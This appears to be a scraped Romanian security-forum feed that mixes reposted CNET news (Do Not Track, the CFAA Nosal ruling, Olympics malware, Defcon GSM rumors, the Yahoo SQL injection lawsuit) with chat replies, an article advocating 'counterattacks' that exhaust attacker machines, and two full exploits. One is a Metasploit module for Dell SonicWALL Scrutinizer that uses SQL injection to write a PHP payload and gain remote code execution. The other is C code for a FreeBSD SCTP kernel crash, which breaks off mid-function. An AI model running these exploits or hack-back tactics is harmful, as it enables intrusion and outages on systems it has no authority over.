DarkyAngel

Microsoft is enabling the Do Not Track feature in the version of Windows 8 that's off to PC makers, guaranteeing a pushback from advertisers. Microsoft is not likely to win over advertisers with its decision to turn on Internet Explorer 10's Do Not Track feature in the RTM version of Windows 8. The Do Not Track, or DNT, feature is designed to stop third-party Web sites from tracking your online activity. Web sites that find Do Not Track turned on in your browser are supposed to back off. Most browsers leave the setting turned off, leaving it up to the user to decide whether to enable it. But a blog post from Microsoft Chief Privacy Officer Brendon Lynch confirmed that the company is sticking with its ongoing policy to turn DNT on by default. The decision to enable the setting in the Windows 8 Release Preview will carry over into the Windows 8 RTM. "In conjunction with the release of the Release Preview of Windows 8 in late May, we announced that we would be turning 'on' a DNT signal as part of the default configuration for IE10," Lynch explained. "Since then, we have conducted additional consumer research that confirmed strong support for our 'consumer-privacy-first' approach to DNT." Microsoft has asserted all along that enabling the feature by default is in the best interests of its customers. But advertisers are likely to continue to raise a stink. The Digital Advertising Alliance, which represents advertisers, said recently that it agreed to honor the DNT feature as long as it was not enabled by default. The DAA has previously complained that Microsoft's decision runs counter to an agreement established earlier this year with the White House. Upset by Microsoft's policy, advertisers could simply decide to ignore the setting in Internet Explorer. Though DNT will be turned on by default, Windows 8 users will have control of the feature during the setup process. Those who choose the Windows 8 "Express Settings" option will be informed that DNT will automatically be turned on. People who instead opt to "customize" their setup will be able to turn the setting on or off. Either way, the setting can always be switched on or off. A representative for Microsoft told CNET that the company had no comment beyond the information in Lynch's blog. Sursa

Appellate court ruled in April that prosecutors were too broadly interpreting a decades-old anti-hacking law to prosecute a man charged with misappropriating trade secrets. The U.S. Justice Department has decided not to petition the U.S. Supreme Court to review an appellate court ruling in a criminal case that found a decades-old anti-hacking law was being applied too broadly. The decision means the 9th U.S. Circuit Court of Appeals' rejection of the case against David Nosal, who was accused of illegally misappropriating trade secrets from his employer, will stand. In a 9-2 ruling, the court found in April that the 1984 federal Computer Fraud and Abuse Act was being interpreted too broadly and warned that millions of Americans could be subjected to prosecution for harmless Web surfing at work under the prosecutors' reading of the law. The case centers on Nosal, a former executive at recruiting agency Korn/Ferry International, who was accused of violating the act by persuading some of his co-workers to send him confidential client information to help him start a competing business. Nosal was also indicted for theft of trade secrets, mail fraud, and conspiracy. "The government's construction of the statute would expand its scope far beyond computer hacking to criminalize any unauthorized use of information obtained from a computer," according to Chief Judge Alex Kozinski, who wrote the lead opinion. "This would make criminals of large groups of people who would have little reason to suspect they are committing a federal crime." The ruling was suspended until today to give the Justice Department time to consider a petition to the Supreme Court to review the decision. In a motion filed Thursday, the U.S. Attorney's office that the "Solicitor General will not file a petition for a writ of certiorari" in the case, without elaborating. CNET has contacted the office of U.S. Solicitor General Donald Verrilli for comment and will update this report when we learn more. Sursa

Crave's Eric Mack looks at some of the digital threats taking advantage of the Games and at how to protect yourself. When the Summer Olympics roll around, you can count on some intense competition in key events like gymnastics. But for 2012, the action isn't just on the mat. It seems that distributing and battling malware and phishing efforts disguised as Olympics apps and info are practically an exhibition sport this summer. An app called "London Olympics Widget" seems harmless enough, but according to Webroot's security blog, it actually rifles through your contacts, device info, and text messages. It's no longer available via the Google Play store, but it's still listed on an Australian site aggregating Android apps, where there are plenty of the telltale signs of skeezy code, including this odd Gmail contact address and English grammar that's not quite right: Any issues or questions just feel to email us: Lebara.sydney.au@gmail.com We will reply you as soon as possible. (no more than 24 hours) Other bits of evidence suggest the app isn't what it appears to be: it's digitally signed from New Delhi, and its own screenshots reveal that, well, it's a pretty lame-looking widget. GFI Software also claims to have found Russian servers hosting sites posing as legit app stores to push out the nasty code to unsuspecting Android devices, making the former Soviet republic competitive in both the medal and malware count this year. Hijacking Olympics fever for fits of digital nastiness didn't originate with the 2012 Games, but using Android as the major vehicle for such efforts may have. Back in 2008, when the Games were in Beijing, more than a dozen different Trojan horses were spotted attached to e-mails with subject lines like "The Beijing 2008 Torch Relay." Those e-mail attacks are back for the London Games as well, and if you've been duped in the process of obsessively tracking the medal count, there's a removal tool now available. Trend Micro also has this helpful list of some of the Olympics-related threats seen this summer. It's a handy reference to check before you click. You've been warned, Olympics fans. Now let's get back to the Games. But just remember -- there's no place for Trojan horses in water polo. Sursa

cam târziu ai tras concluzia.

me2 union - database : version #pm sent

#pm sent.

^ relog în platforma PoS, dac? tot nu merge, delete all cache & cookies & moloz & try again

#pm sent

E mult prea încrezut.. vorba lu` Nytro, trebuiau s?-?i bat? joc de el..

deci.. meanwhile.. s-a implementat func?ia "Crypt". la un fi?ier , ape?i click dreapta ?i ai op?iunea "Crypt". se va deschide o fereastr? cu ni?te op?iuni. cum scrie ?i acolo la "Help" , parola ?i metoda pot fi alese diferit pentru orice fi?ier. nici metoda, nici parola nu se salveaz? niciunde, pe baza lor se cripteaz? fi?ierul . NU vom putea ?ti dac? un fi?ier e criptat sau nu, nesalvându-se nici un fel de date. dac? voi încerca?i s? decripta?i, ?i folosi?i o metod? sau parol? gre?it?, con?inutul fi?ierului NU se va mai putea recupera ( eventual doar criptând din nou cu metoda ?i parola "gre?ite" pentru a ajunge la vechiul con?inut "criptat" cu cele bune ) . MOMENTAN MERG DOAR METODELE 'RC4' ?I 'AES'. @STiL, relogheaz?-te în platform?. ( log off din butonul din taskbar )

^ categorie gre?it?, titlu gre?it..

Welcome aboard.

^ voi vede?i b? de când e topicu`?

Random error messages, suspicious voice message numbers, fuzzy screens, and jammed networks had some hackers worried. Every year at Defcon there are rumors of some network being hacked. It would be unusual if such tales didn't crop up at the world's largest hacker conference. But this year there were reports from a number of credible sources of strange behavior on phones -- reports that had people more paranoid than normal. Here's what people said they were seeing last weekend, along with some possible explanations for the scenarios: • Voice mail messages that led to unknown numbers instead of to the standard phone number that points to the user's automated voice message recovery system. • Strange text messages that appeared to have been sent from a given smartphone but that the phone's user insisted he or she hadn't sent. These oddities could be the result of someone using an OpenBTS (Open Base Transceiver Station) -- software that serves as a GSM (Global System for Mobile Communications) access point. GSM calls can be intercepted because the connection to the base station isn't authenticated. "Someone could have set up infrastructure to make it look like they are a carrier. They make your phone connect to it and put their BTS into a mode that accepts all phones and turn off encryption," said Don Bailey, a mobile expert at Capitol Hill Consultants. "The phone thinks it's connected...and they can intercept outgoing phone calls, listen in, and record the call, and SMS messages. They can forward them to the real network or put them into a black hole, which is more likely." One way to tell if a call has been intercepted by a fake BTS station is if the number is either blocked or incorrect, he said. Mobile security expert Collin Mulliner reported that he too had issues but suspected that it was because of too many connections on the network. "Today it is fairly easy to set up a fake base station and send strange messages to everybody who connects," he said in an e-mail. That "works well indoors because of bad reception where phones jump on the bad network without jamming. The most likely thing at Defcon is pulling pranks. SMS is an easy path for pranks. Basically, I have built a setup to do this in my lab. The best defense is to switch to 3G only. Attacking 3G is harder compared to GSM." A mobile application programmer, who asked not to be named, told CNET he had overheard people talking late one night about how they were trying to "mess with" the GSM network and do a man-in-the-middle attack to intercept communications but were having technical difficulties pulling it off. "They were capturing traffic and tricking peoples' phones into connecting to the wrong tower, but they couldn't complete the man-in-the-middle (attack) because they couldn't talk to the real tower on the other side," he said. • Overheating of phones and batteries running down much faster than normal.3 There were numerous reports of problems accessing the cell networks. Many people said they could use their phones in the mornings just fine but had problems in the afternoon. This makes sense because after a late night of drinking and carousing, most hackers like to sleep in. This year the network-access issues were particularly bad. "It wasn't this disruptive last year," said Nico Sell, one of the organizers of Defcon. "I've never been frustrated to this level with my communications on the phone. It's much worse than last year." This could have been caused by the increased numbers of people using the networks, said several mobile experts. There were about 15,000 attendees this year, compared with 12,000 or 13,000 last year. But there's also the possibility that someone was using a Femtocell, which is a small, low-power cellular base station, to trick the smartphones in the vicinity into thinking he or she was a legitimate cell network. This scenario is actually quite plausible, since someone was seen walking around the event with a Femto cell in his backpack. Someone using a Femtocell "is going to attempt to pose as a legitimate cell network, but is probably just jamming the networks unintentionally," said Bailey. What happens is that phones act funny because they're trying so desperately to connect to what they think is the cell network and think they have a connection but they don't. The phones "try to keep re-associating back to the Femtocell, thinking it's got a good connection when it doesn't," he said. "It's an intensive process, so it drains the battery. It's using its strongest power to search for any cell station on any channel. Once you get in that loop, it's going to drain your battery very quickly." Famed hacker Kevin Mitnick said his phone on AT&T service was downgraded to Edge and that he wasn't sure whether it was because the spectrum was saturated or that there was a base station radio hack or cell jammers were being used. "I suspect both attacks. Low cost. Effective. Put radio in backpack and walk around," he said in a text message. Adding, "nothing can be confirmed without testing." Charlie Miller, principal research consultant at Accuvant and a mobile security specialist, said he too had noticed some funny business, but that he wasn't worried. "Yeah, my phone was acting up, but I think that's pretty typical Defcon behavior," he said in a text message. "My phone didn't have data access for a day, and when I rebooted it at the airport, I suddenly received a bunch of SMS's I was supposed to get the previous day. That said, I doubt it's anything to be concerned about." One hacker said his phone had been displaying weird messages like "SD Card Removed" or "SD Card Reformatted or Corrupted" for no apparent reason, and another was convinced something was wrong when the display of his GSM-based Android, a Samsung Galaxy Note, freaked out several times, showing fuzz and lines and flipping images around, as if possessed. He had something similar happen to a different, CDMA-based phone at Defcon last year. Bailey, however, was fairly certain that was because of a hardware issue. "GSM users fight for the same time slot, and if there are too many people fighting for the same channel, it will cause a failure for the phone to react accordingly, so you will get intermittent pieces of data flying back and forth between your phone and the cell tower and it will have to sync constantly," he said. "Because of that problem, you will see more bugs turn up than normal because phones typically aren't stressed to those limits in normal environments.... When the base band gets confused and has too much to do, it can cause memory faults that affect the application processor in unexpected ways. It's not so much a security issue as it is an engineering and stability issue, though it certainly can turn into a potential security issue in the right hands. But that's speculative." Meanwhile, a report of a suspicious over-the-air push from Verizon was actually a legitimate update, according to a Verizon representative. "We regularly send the latest software updates to a customer's device for download by the user and we believe the over-the-air push at issue was legitimate," a spokeswoman said in an e-mail to CNET. It can be very difficult to parse reality from myth at an event like Defcon, which serves as a petri dish for testing offensive and defensive techniques. But unless someone takes the time and effort to verify a hack -- in between all the sessions, games, and partying -- a rumor remains just that. Last year's rumor that Android phones on CDMA and 4G were hacked faded like so much spilled beer on a cheap carpet. One cellular engineer I talked to this year about that alleged hack insisted that it wasn't hackers, it wasn't the feds, it was something much more mundane and explainable, but he declined to comment further. One thing is for sure, hackers are a paranoid lot, partly because they know so much about security weaknesses and partly out of projection. If it's possible, someone will try it, right? But the cellular network isn't the Internet. "Most people don't really understand what's going on with their phone. It's the point at which intelligence meets ignorance. You've got a lot of really smart people that don't technically understand what's going on in their phone, so they perceive things that may not be happening," Bailey said. "The first instinct is to jump to the conclusion that it's a security related issue, when it's probably not." Sursa

Lawsuit claims Yahoo was negligent in not encrypting data and not securing database against an SQL injection attack. A New Hampshire man filed suit against Yahoo this week alleging that lax security measures allowed hackers to get into a Yahoo database and steal passwords from 450,000 accounts. In his lawsuit seeking class-action status -- filed in federal court in San Jose, Calif., on Tuesday (PDF) -- Jeff Allan is asking the court to order Yahoo to compensate him and others for "resulting account fraud" and measures people had to take to protect against identity theft. Not only was Allan's Yahoo password stolen but someone also had accessed his eBay account without his permission after the Yahoo breach because he had used the same log-in credentials there, according to the suit. He also said he bought a subscription to Experian credit monitoring services for $14.95 a month. Allan's account on the Yahoo Contributor Network site contained personal information including his name; e-mail address; PayPal e-mail address; date of birth; residency/citizenship; physical address and telephone number; and even his Social Security number, among other information, he said. A group of hackers known as "D33Ds Co." publicly posted more than 450,000 usernames and passwords obtained from Yahoo's Contributor Network site last month. They said they had used an SQL injection to trick a database into revealing data and did the hack to expose lax security at Yahoo. The data was stored in plain text instead of cryptographically masked in a process called "hashing." Yahoo was negligent in not taking measures to protect against such a common attack and in not using encryption to protect the data, the suit alleges. "The SQL injection technique used against Yahoo has been known for over a decade and had already been used for massive data thefts against Heartland Payment Systems and others," the suit says. "As far back as 2003, the Federal Trade Commission considered SQL injection attacks to be well-known and foreseeable events that can and should be taken into account through routine security measures." "Yahoo failed to secure the data server containing that information from SQL injection attacks, encrypt the personal information contained in the database, and monitor its networks to identify suspicious amounts of out-bound data," the suit claims. "In failing to employ these basic and well-known Internet measures, Yahoo departed from the reasonable standard of care and violated its duty to protect Plaintiff's and class members' personal information." We've contacted Yahoo for comment and will update this post if and when we hear back. Sursa

just curious.. ce cuno?tiin?e ai tu în php? // welcome aboard.

ne-am gândit ?i lucr?m la implementarea unor noi func?ii în PoS, ?i anume: - fi?ierele fiec?rui utilizator sunt criptate în parte, pe baza parolei NECRIPTATE, care o introduce la LOGIN, ?i care NU SE SALVEAZA NICIUNDE, decât în contul respective persoane, ca md5(parola.md5(parola.md5(parola??))) . astfel, nici noi, nici oricine ar lua acces la fi?ierele noastre nu v? va putea decripta fi?ierele, asigurându-v? pragul maxim de privacy. - "wipe disk" <-> la dorinta voastra din motive cunoscute de voi, ve?i putea trimite un mail la wipe@p-o-s.org cu user : parola , si un script automat va sterge definitiv contul vostru si continutul lui.

Dell SonicWALL Scrutinizer 9 SQL Injection Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Dell SonicWALL Scrutinizer 9 SQL Injection", 'Description' => %q{ This module exploits a vulnerability found in Dell SonicWall Scrutinizer. While handling the 'q' parameter, the PHP application does not properly filter the user-supplied data, which can be manipulated to inject SQL commands, and then gain remote code execution. Please note that authentication is NOT needed to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'muts', 'Devon Kearns', 'sinn3r' ], 'References' => [ ['CVE', '2012-2962'], ['OSVDB', '84232'], ['EDB', '20033'], ['BID', '54625'], ['URL', 'http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ # According to advisory, version 9.5.1 and before are vulnerable. # But was only able to test this on 9.0.1.0 ['Dell SonicWall Scrutinizer 9.5.1 or older', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jul 22 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the SonicWall Scrutinizer\'s statusFilter file', '/d4d/statusFilter.php']), OptString.new('HTMLDIR', [true, 'The HTML root directory for the web application', 'C:\\Program Files\\Scrutinizer\\html\\']) ], self.class) end def check res = send_request_raw({'uri'=>target_uri.host}) if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit peer = "#{rhost}:#{rport}" p = "<?php #{payload.encoded} ?>" hex_payload = p.unpack("H*")[0] php_fname = Rex::Text.rand_text_alpha(5) + ".php" rnd_txt = Rex::Text.rand_text_alpha_upper(3) print_status("#{peer} - Sending SQL injection...") res = send_request_cgi({ 'uri' => target_uri.path, 'method' => 'POST', 'vars_post' => { 'commonJson' => 'protList', 'q' => "#{rnd_txt}' union select 0x#{hex_payload},0 into outfile '../../html/d4d/#{php_fname}'#" } }) if res and res.body !~ /No Results Found/ print_error("#{peer} - I don't think the SQL Injection attempt worked") return elsif not res print_error("#{peer} - No response from the server") return end # For debugging purposes, this is useful vprint_status(res.to_s) target_path = "#{File.dirname(target_uri.path)}/#{php_fname}" print_status("#{peer} - Requesting: #{target_path}") send_request_raw({'uri' => target_path}) handler end end # 1337day.com [2012-08-03] Sursa

By Including The Counterattack in IT Security Strategy Planning, Security Teams Can Quickly Change The Dynamics of a Cyber Attack... Any competent military commander knows that when put in a defensive position, defense forces are never be able to withstand long and sustained offensive attacks. The assumption that the front line of defense will eventually be breached is also true in the realm of the information security battle of defense. As an IT defender who protects with network security products, you may never feel confident that your solutions will provide sufficient security protection under all circumstances. The cyber enemy may try and surprise you in so many ways and, if he is persistent and intelligent, will eventually find an attack for which you weren’t prepared. Doubtless, this is exactly where the enemy will focus his efforts. The attack will concentrate on that weakness in order to wear you down and penetrate through all your defense layers. There is, however, a strategy to address the inherent inferiority of a defending force versus an attacking force: It is called a Counterattack. If network security professionals include the counterattack in their IT security planning, they can quickly change the dynamics of a cyber attack. The Counterattack A counterattack is the term used to describe large-scale, usually strategic offensive operations by forces that had successfully halted an enemy’s offensive while occupying defensive positions. A counter-attack is considered to be the most efficient means of forcing the attacker to abandon offensive plans. The counter attack operation should be well prepared in order to hit the attacking forces precisely in weak spots of their own, thus impeding the attacker’s capabilities, both physical and motivational, in the most effective way possible. These weak spots can and should be identified before and during the battle by field intelligence (in our case, security experts with hands-on experience with the attack tool). There are three main conditions that need to be met in order for a counter offense to be successful: The enemy’s weak spots must be successfully identified. The defense force must be well trained to conduct a counter attack operation. The defense force must successfully halt the enemy’s offense. In the realm of cyber attacks, the concept of a counterattack operation must also play a major role in the defense strategy against emerging cyber threats. The counter-attack approach could be a game changer, as it enables overcoming limitations in existing defense strategies against cyber attacks. In Part One of this article, I’ll discuss a cyber attack mitigation strategy, with emphasis on the counterattack operation – an approach to attack mitigation that exhausts the attack source. Breaching the Perimeter Borders In the realm of information security, counterattack operations are all about reaching the origin of the attacks and impacting them in a way that will reverse the power relationship in favor of the defenders. Cyber attackers are becoming more and more persistent. They are capable of harming online businesses, regardless of their motivations, with a wide arsenal of attack techniques and tools. Today’s attackers aim to deny service (DoS attacks), take control or steal information through different attack methods at the network and application levels. This is done through either highly visible large volume attacks or more low-rate and stealthy types of attacks. Sometimes both attack types are used simultaneously in order to ensure success in case one attack vector fails. Persistent attackers will use different tools aiming to exploit weaknesses in the different layers of defense. Once a weakness is spotted in one of the layers -- an effort that sometimes can take days -- the attacker will focus on exploiting it to the fullest. Today’s attack operations can recruit an infinite amount of resources such as bot-infected machines, voluntary attackers who take part in larger coordinated campaigns orchestrated by hacktivists, or by non-voluntary attackers unaware their machines have been hijacked. This makes the power relationship between attackers and defenders extremely challenging. The answer to the question of how on-line businesses and organizations can reduce the probability of becoming a victim of these persistent advanced attacks, or how to resist these attacks in a way that renders them unsuccessful, has a lot to do with the counterattack operation approach. Ideally, defenders would like to get as close as possible to each attacker and neutralize his ability to generate the attack traffic, thus cleaning the “bad” traffic end-to-end – a very effective way to neutralize DDoS attacks. What if you could create a situation in which the attacker’s machines are slowed down or even halted, thus making the bad guys quit the whole attack campaign for obvious reasons? This last option is possible and can reverse the one-sided power relationship between the attackers and the defenders through a successful counterattack operation. In order to do this, the defense mechanisms should virtually “breach” the network perimeter borders. The following diagrams illustrate this: Figure 1: Breaching network perimeters with a counter attack operation Figure 2: Exhausting the attack source and end-to-end attack mitigation As shown in the above illustrations, there are a few perimeter borders that the attack traverses from its origin to the target destination. The closer the mitigation process to the attack’s origin, the better the cleaning will be. This is what we define as end-to-end mitigation. Moreover, if the mitigation technique can naturalize the attack tool, through a counterattack technique, the effect becomes much stronger as it essentially “exhausts” the attacker, making him rethink the plausibility of continuing the attack on the target, or launching a similar attack on the target in the future. The main advantage of the counterattack is that it reaches the source wherever it is, virtually breaching all network perimeter borders. All this is done without the need to physically deploy a network security device in each one of these perimeters. To summarize, the main advantages of a counter-attack are: Virtually extending the network perimeter of defense up to the attack origin. “Exhausting” the attacker in a way that will make him quit the attack campaign. Reversing the “impossible” power relationships between the attackers and defenders. In Part Two of this column, I’ll talk about the importance of pattern matching to identify the attack tool hackers may use against your network and how to administer a reverse multi-vulnerability attack campaign against them like a cyber judo chop. Original Article

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20226[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Shaun Colley[/td] [td]Published: 2012-08-03[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] /* * FreeBSD kernel SCTP (latest release) remote NULL ptr dereference DoS * * by Shaun Colley <scolley@ioactive.com>, 2 Aug 2012 * * The SCTP implementation used by FreeBSD ("reference implementation") is vulnerable to a remote * NULL pointer dereference in kernel due to a logic bug. When parsing ASCONF chunks, an attempt is * made to find an association by address. if the address found is INADDR_ANY, sctp_findassoc_by_vtag() * is called and an attempt is made to find an association by vtag. Before searching for the vtag in a * hash table, a pointer is set to NULL, with the intention of redefining it after finding the association. * However, if the specified vtag is not found, the function returns and the ptr is never reinitialised, * causing a kernel panic when the NULL pointer is later dereferenced by the SCTP_INP_DECR_REF macro when * flow returns to sctp_process_control(). * * i.e. * * static struct sctp_tcb * * sctp_findassoc_by_vtag(struct sockaddr *from, uint32_t vtag, * struct sctp_inpcb **inp_p, struct sctp_nets **netp, uint16_t rport, * uint16_t lport, int skip_src_check) * * { * * [ ... ] * * *netp = NULL; * *inp_p = NULL; * * [ ... ] * * head = &sctppcbinfo.sctp_asochash[SCTP_PCBHASH_ASOC(vtag, * 1690 sctppcbinfo.hashasocmark)]; * if (head == NULL) { * // invalid vtag * SCTP_INP_INFO_RUNLOCK(); * return (NULL); * } * * The page fault is a write AV at 0x0 + 0x33c but since there is no associated user context, this * doesn't appear to be exploitable (i.e. by mapping the NULL page) * * Tested against FreebSD 8.2-RELEASE but latest release is also vulnerable. The target system must have an open * SCTP port * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <fcntl.h> #include <netinet/ip.h> #include <netdb.h> #include <string.h> /* sctp checksum implementation, basically ripped from wireshark */ #define SP_LEN 2 #define DP_LEN 2 #define VTAG_LEN 4 #define CHK_LEN 4 #define HEADER_LEN (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN) #define CRC32C(c, d) (c = (c >> 8) ^ crc_c[(c ^(d)) & 0xFF]) /* SCTP chunk types */ #define SCTP_AUTH 0x0f #define SCTP_ASCONF 0xc1 static int crc_c[256] = { 0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L, 0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL, 0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL, 0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L, 0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL, 0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L, 0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L, 0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL, 0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL, 0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L, 0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L, 0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL, 0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L, 0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL, 0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL, 0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L, 0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L, 0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L, 0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L, 0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L, 0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L, 0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L, 0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L, 0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L, 0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L, 0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L, 0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L, 0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L, 0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L, 0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L, 0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L, 0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L, 0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL, 0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L, 0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L, 0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL, 0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L, 0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL, 0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL, 0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L, 0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L, 0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL, 0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL, 0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L, 0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL, 0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L, 0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L, 0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL, 0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L, 0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL, 0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL, 0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L, 0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL, 0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L, 0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L, 0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL, 0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL, 0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L, 0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L, 0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL, 0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L, 0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL, 0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL, 0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L, }; static unsigned int sctp_crc32c(const unsigned char *buf, unsigned int len) { unsigned int i; unsigned int crc32 = ~0U; unsigned int r; unsigned char b0, b1, b2, b3; for(i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++) CRC32C(crc32, buf[i]); CRC32C(crc32, 0); CRC32C(crc32, 0); CRC32C(crc32, 0); CRC32C(crc32, 0); for (i = HEADER_LEN; i < len; i++) CRC32C(crc32, buf[i]); r = ~crc32; b0 = r & 0xff; b1 = (r >> 8) & 0xff; b2 = (r >> 16) & 0xff; b3 = (r >> 24) & 0xff; crc32 = ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3); return crc32; } /* basic sctp header */ struct sctphdr { unsigned short sport; unsigned short dport; unsigned int vtag; unsigned csum; }; /* sctp chunk header */ struct sctp_chunkhdr { unsigned char type; unsigned char flags; unsigned short length; }; /* ASCONF chunk */ struct sctp_asconf_chunk { struct sctp_chunkhdr ch; unsigned int serial; }; /* AUTH chunk */ struct sctp_auth_chunk { struct sctp_chunkhdr ch; unsigned short shared_key_id; unsigned short hmac_id; unsigned char hmac[0]; }; /* SCTP parameter header */ struct sctp_paramhdr { unsigned short type; unsigned short length; }; /* ipv4 address parameter */ struct sctp_ipv4addr_param { struct sctp_paramhdr ph; unsigned int addr; }; /* standard crc32 IP checksum */ unsigned short checksum(unsigned short *addr, int len) { int nleft = len; unsigned int sum = 0; unsigned short *w = addr; unsigned short answer = 0; while(nleft > 1) { sum += *w++; nleft -= 2; } if(nleft == 1) { *(unsigned char *)(&answer) = *(unsigned char *)w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return answer; } int main(int argc, char *argv[]) { int sock = 0, ret = 0; int on = 1; /* for setsockopt() call */ struct ip *iph = NULL; struct sctphdr *sctph = NULL; struct sctp_auth_chunk *auth_chunk = NULL; struct sctp_asconf_chunk *asconf_chunk = NULL; struct sctp_ipv4addr_param *ipv4_addr = NULL; char *crash = NULL; struct sockaddr_in sin; struct hostent *hp = NULL; printf("\n[*] freebsd sctp remote NULL ptr dereference\n\n"); if(argc < 3) { printf("usage: %s <host> <port>\n\n", argv[0]); return -1; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_SCTP); if(sock < 0) { printf("[*] error making socket!\n"); return -1; } /* tell the kernel not to put any IP headers in */ if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) { printf("[*] setsockopt() error\n"); return -1; } hp = 